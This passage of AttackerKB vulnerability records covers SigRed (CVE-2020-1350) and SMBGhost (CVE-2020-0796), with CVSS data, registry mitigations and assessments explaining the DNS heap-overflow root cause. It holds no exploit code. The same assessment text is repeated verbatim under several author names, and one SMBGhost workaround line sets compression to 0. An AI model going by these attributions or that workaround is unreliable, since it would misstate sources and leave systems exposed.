handle requests.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at July 14, 2020 6:11pm UTC reported:\n\nImportant Update: This is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nUpdate: Checkpoint has since released their blog post at <https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/> with much more details on this vulnerability than when I originally wrote this. I\u2019ll update a few statements here but readers are encouraged to read the paper for more details.\n\nOn July 14th, 2020, Microsoft released CVE-2020-1350, a critical DNS server remote code execution vulnerability that can result in Domain compromise and which is listed as a 10.0 CVE rating. Microsoft also described this vulnerability as wormable and recommended the following mitigation:\n \n \n HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters \n DWORD = TcpReceivePacketSize \n Value = 0xFF00\n \n\nThis is rather odd to me. 0xFF00 looks like a potential mitigation against a integer overflow, as its possible the vulnerability stems from any packets being over 0xFFFF causing an integer overflow in memory, resulting in the allocation of a very small amount of memory to hold a very large buffer. At the very least, the fact that the recommended mitigation forcibly controls the max size of the packet that can be received suggests that this is a buffer overflow of some sort. Given the dynamic nature of DNS and the fact that it has to handle multiple requests at once, my guess is that its a heap buffer overflow.\n\nNow that CheckPoint\u2019s blog post is public one can confirm that this is in fact a integer overflow leading to a heap buffer overflow within the `SigWireRead` function of `dns.exe`, the server component of Microsoft\u2019s DNS implementation. When the DNS server receives a SIG query response, that, when decompressed, incremented by 0x14, and added to the result of an earlier `Name_PacketNameToCountNameEx` call, is greater than 0xFFFF, will result in integer overflow, resulting in the following `RR_AllocateEx` call allocating too small of a heap buffer for the resource record, and a heap buffer overflow occurring when `memcpy` is called to copy the SIG query response into the overly small heap buffer that `RR_AllocateEx` allocated.\n\nA very important point to note here is that whilst there is a RCE potential here by smuggling DNS requests over HTTP, it seems that CheckPoint has noted that only some browsers, notably Microsoft Edge and Internet Explorer, actually support sending HTTP requests to port 53, so whilst their video at <https://youtu.be/PUlMmhD5it8> is certainly pretty cool, its important to note that with Google Chrome taking up over 65% of the browser market share according to <https://gs.statcounter.com/browser-market-share> as of July 2020, and IE and Edge accounting for a combined total of roughly 4% of all browsers, its pretty unlikely that most organizations will be affected by the HTTP smuggling attack vector unless users are forced to use IE/Edge in their networks for some reason (such as support for legacy apps).\n\nEdit: **@cblack-r7** Also pointed out to me that looking at <https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability> they mention this line \u201cAfter the workaround is implemented, a Windows DNS server will be unable to resolve DNS names for its clients when the DNS response from the upstream server is larger than 65280 bytes.\u201d He noticed that the terminology \u201cupstream server\u201d could mean that the malicious overly large DNS response has to come from an upstream resolver, which could complicate this vulnerability a little bit. This is also something that **@busterb**\u2019s assessment seems to reflect concern about and is something that the CheckPoint blog doesn\u2019t really address from what I\u2019ve seen (though feel free to correct me if I am wrong here)\n\nIt should be noted that this vulnerability only affects Microsoft\u2019s DNS implementation, however it goes way back all the way to Windows Server 2008. I wouldn\u2019t be surprised if this also potentially affected Windows Server 2003 as well though, given how these types of vulns tend to be rather systemic, but I could be wrong there.\n\nAnother important point to note is that on Windows the DNS service runs as SYSTEM, so this will essentially be a remote SYSTEM level exploit for any attackers, which is pretty powerful. Unfortunately there is a limitation that if this is a remote RCE on the heap, the attacker will most likely have to deal with a lot of the new heap related mitigations introduced starting with Windows 8 and which were greatly improved with Windows 10. So this likely means that Windows Server 2008 and Windows Server 2008 R2 will be easy to develop an exploit for, but more recent servers like Windows Server 2019 may see a noticeable lag in exploit development time whilst exploit developers work their way around these mitigations. This can be seen in past heap overflow exploits where the Windows 7/Windows Server 2008 exploit came out very quickly but in some cases it took several months or even a year for the Windows 10/Server 2019 exploit to come out.\n\nIt should be noted that whilst this vulnerability has not been used in active attacks according to Microsoft, I\u2019d safely place money on seeing this vulnerability get weaponized very quickly.\n\n**busterb** at July 14, 2020 9:20pm UTC reported:\n\nImportant Update: This is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nUpdate: Checkpoint has since released their blog post at <https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/> with much more details on this vulnerability than when I originally wrote this. I\u2019ll update a few statements here but readers are encouraged to read the paper for more details.\n\nOn July 14th, 2020, Microsoft released CVE-2020-1350, a critical DNS server remote code execution vulnerability that can result in Domain compromise and which is listed as a 10.0 CVE rating. Microsoft also described this vulnerability as wormable and recommended the following mitigation:\n \n \n HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters \n DWORD = TcpReceivePacketSize \n Value = 0xFF00\n \n\nThis is rather odd to me. 0xFF00 looks like a potential mitigation against a integer overflow, as its possible the vulnerability stems from any packets being over 0xFFFF causing an integer overflow in memory, resulting in the allocation of a very small amount of memory to hold a very large buffer. At the very least, the fact that the recommended mitigation forcibly controls the max size of the packet that can be received suggests that this is a buffer overflow of some sort. Given the dynamic nature of DNS and the fact that it has to handle multiple requests at once, my guess is that its a heap buffer overflow.\n\nNow that CheckPoint\u2019s blog post is public one can confirm that this is in fact a integer overflow leading to a heap buffer overflow within the `SigWireRead` function of `dns.exe`, the server component of Microsoft\u2019s DNS implementation. When the DNS server receives a SIG query response, that, when decompressed, incremented by 0x14, and added to the result of an earlier `Name_PacketNameToCountNameEx` call, is greater than 0xFFFF, will result in integer overflow, resulting in the following `RR_AllocateEx` call allocating too small of a heap buffer for the resource record, and a heap buffer overflow occurring when `memcpy` is called to copy the SIG query response into the overly small heap buffer that `RR_AllocateEx` allocated.\n\nA very important point to note here is that whilst there is a RCE potential here by smuggling DNS requests over HTTP, it seems that CheckPoint has noted that only some browsers, notably Microsoft Edge and Internet Explorer, actually support sending HTTP requests to port 53, so whilst their video at <https://youtu.be/PUlMmhD5it8> is certainly pretty cool, its important to note that with Google Chrome taking up over 65% of the browser market share according to <https://gs.statcounter.com/browser-market-share> as of July 2020, and IE and Edge accounting for a combined total of roughly 4% of all browsers, its pretty unlikely that most organizations will be affected by the HTTP smuggling attack vector unless users are forced to use IE/Edge in their networks for some reason (such as support for legacy apps).\n\nEdit: **@cblack-r7** Also pointed out to me that looking at <https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability> they mention this line \u201cAfter the workaround is implemented, a Windows DNS server will be unable to resolve DNS names for its clients when the DNS response from the upstream server is larger than 65280 bytes.\u201d He noticed that the terminology \u201cupstream server\u201d could mean that the malicious overly large DNS response has to come from an upstream resolver, which could complicate this vulnerability a little bit. This is also something that **@busterb**\u2019s assessment seems to reflect concern about and is something that the CheckPoint blog doesn\u2019t really address from what I\u2019ve seen (though feel free to correct me if I am wrong here)\n\nIt should be noted that this vulnerability only affects Microsoft\u2019s DNS implementation, however it goes way back all the way to Windows Server 2008. I wouldn\u2019t be surprised if this also potentially affected Windows Server 2003 as well though, given how these types of vulns tend to be rather systemic, but I could be wrong there.\n\nAnother important point to note is that on Windows the DNS service runs as SYSTEM, so this will essentially be a remote SYSTEM level exploit for any attackers, which is pretty powerful. Unfortunately there is a limitation that if this is a remote RCE on the heap, the attacker will most likely have to deal with a lot of the new heap related mitigations introduced starting with Windows 8 and which were greatly improved with Windows 10. So this likely means that Windows Server 2008 and Windows Server 2008 R2 will be easy to develop an exploit for, but more recent servers like Windows Server 2019 may see a noticeable lag in exploit development time whilst exploit developers work their way around these mitigations. This can be seen in past heap overflow exploits where the Windows 7/Windows Server 2008 exploit came out very quickly but in some cases it took several months or even a year for the Windows 10/Server 2019 exploit to come out.\n\nIt should be noted that whilst this vulnerability has not been used in active attacks according to Microsoft, I\u2019d safely place money on seeing this vulnerability get weaponized very quickly.\n\n**ccondon-r7** at July 28, 2020 8:24pm UTC reported:\n\nImportant Update: This is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nUpdate: Checkpoint has since released their blog post at <https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/> with much more details on this vulnerability than when I originally wrote this. I\u2019ll update a few statements here but readers are encouraged to read the paper for more details.\n\nOn July 14th, 2020, Microsoft released CVE-2020-1350, a critical DNS server remote code execution vulnerability that can result in Domain compromise and which is listed as a 10.0 CVE rating. Microsoft also described this vulnerability as wormable and recommended the following mitigation:\n \n \n HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters \n DWORD = TcpReceivePacketSize \n Value = 0xFF00\n \n\nThis is rather odd to me. 0xFF00 looks like a potential mitigation against a integer overflow, as its possible the vulnerability stems from any packets being over 0xFFFF causing an integer overflow in memory, resulting in the allocation of a very small amount of memory to hold a very large buffer. At the very least, the fact that the recommended mitigation forcibly controls the max size of the packet that can be received suggests that this is a buffer overflow of some sort. Given the dynamic nature of DNS and the fact that it has to handle multiple requests at once, my guess is that its a heap buffer overflow.\n\nNow that CheckPoint\u2019s blog post is public one can confirm that this is in fact a integer overflow leading to a heap buffer overflow within the `SigWireRead` function of `dns.exe`, the server component of Microsoft\u2019s DNS implementation. When the DNS server receives a SIG query response, that, when decompressed, incremented by 0x14, and added to the result of an earlier `Name_PacketNameToCountNameEx` call, is greater than 0xFFFF, will result in integer overflow, resulting in the following `RR_AllocateEx` call allocating too small of a heap buffer for the resource record, and a heap buffer overflow occurring when `memcpy` is called to copy the SIG query response into the overly small heap buffer that `RR_AllocateEx` allocated.\n\nA very important point to note here is that whilst there is a RCE potential here by smuggling DNS requests over HTTP, it seems that CheckPoint has noted that only some browsers, notably Microsoft Edge and Internet Explorer, actually support sending HTTP requests to port 53, so whilst their video at <https://youtu.be/PUlMmhD5it8> is certainly pretty cool, its important to note that with Google Chrome taking up over 65% of the browser market share according to <https://gs.statcounter.com/browser-market-share> as of July 2020, and IE and Edge accounting for a combined total of roughly 4% of all browsers, its pretty unlikely that most organizations will be affected by the HTTP smuggling attack vector unless users are forced to use IE/Edge in their networks for some reason (such as support for legacy apps).\n\nEdit: **@cblack-r7** Also pointed out to me that looking at <https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability> they mention this line \u201cAfter the workaround is implemented, a Windows DNS server will be unable to resolve DNS names for its clients when the DNS response from the upstream server is larger than 65280 bytes.\u201d He noticed that the terminology \u201cupstream server\u201d could mean that the malicious overly large DNS response has to come from an upstream resolver, which could complicate this vulnerability a little bit. This is also something that **@busterb**\u2019s assessment seems to reflect concern about and is something that the CheckPoint blog doesn\u2019t really address from what I\u2019ve seen (though feel free to correct me if I am wrong here)\n\nIt should be noted that this vulnerability only affects Microsoft\u2019s DNS implementation, however it goes way back all the way to Windows Server 2008. I wouldn\u2019t be surprised if this also potentially affected Windows Server 2003 as well though, given how these types of vulns tend to be rather systemic, but I could be wrong there.\n\nAnother important point to note is that on Windows the DNS service runs as SYSTEM, so this will essentially be a remote SYSTEM level exploit for any attackers, which is pretty powerful. Unfortunately there is a limitation that if this is a remote RCE on the heap, the attacker will most likely have to deal with a lot of the new heap related mitigations introduced starting with Windows 8 and which were greatly improved with Windows 10. So this likely means that Windows Server 2008 and Windows Server 2008 R2 will be easy to develop an exploit for, but more recent servers like Windows Server 2019 may see a noticeable lag in exploit development time whilst exploit developers work their way around these mitigations. This can be seen in past heap overflow exploits where the Windows 7/Windows Server 2008 exploit came out very quickly but in some cases it took several months or even a year for the Windows 10/Server 2019 exploit to come out.\n\nIt should be noted that whilst this vulnerability has not been used in active attacks according to Microsoft, I\u2019d safely place money on seeing this vulnerability get weaponized very quickly.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-1350 Windows DNS Server Remote Code Execution (SigRed)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-12-28T00:00:00", "id": "AKB:1DE0ADEC-8107-491A-BC8F-DCC3BF6EB3AB", "href": "https://attackerkb.com/topics/egp32neD6z/cve-2020-1350-windows-dns-server-remote-code-execution-sigred", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T08:16:06", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka \u2018Windows SMBv3 Client/Server Remote Code Execution Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**jorgeorchilles** at March 11, 2020 1:19pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**zeroSteiner** at April 15, 2020 4:10pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**FULLSHADE** at April 21, 2020 3:50am UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**brettsec** at March 10, 2020 9:16pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**busterb** at March 15, 2020 12:19pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code exection, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB client and server that have SMBv3 Compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nMethod to identify if SMB v3.11 is running and therefore vulnerable, given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-0796 - SMBGhost", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2023-10-06T00:00:00", "id": "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "href": "https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:42:57", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 